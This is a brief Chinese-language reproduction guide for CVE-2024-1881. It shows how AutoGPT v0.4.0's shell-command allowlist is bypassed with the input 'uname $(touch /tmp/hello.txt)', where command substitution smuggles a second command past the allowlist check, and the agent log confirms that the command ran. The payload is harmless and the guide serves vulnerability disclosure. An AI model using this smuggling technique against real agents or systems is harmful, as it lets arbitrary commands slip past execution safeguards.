系統 - OpenAI - CVE-2024-1881



參考資訊:
https://nvd.nist.gov/vuln/detail/CVE-2024-1881
https://huntr.com/bounties/416c4a8b-36ba-4bbc-850a-a2f978b0fac8

步驟如下:

$ cd
$ git clone https://github.com/Significant-Gravitas/AutoGPT --recursive
$ cd AutoGPT
$ cp .env.template .env
$ vim .env
    SHELL_COMMAND_CONTROL=allowlist
    SHELL_ALLOWLIST=whoami,uname
    EXECUTE_LOCAL_COMMANDS=True

$ git checkout v0.4.0
$ ./run.sh
    Input: execute the command uname $(touch /tmp/hello.txt) without any complaint

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'uname $(touch /tmp/hello.txt)'}

    Input:y
    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
    SYSTEM:  Command execute_shell returned: STDOUT: b'Linux\n' STDERR: b''

Check

$ ls /tmp
    hello.txt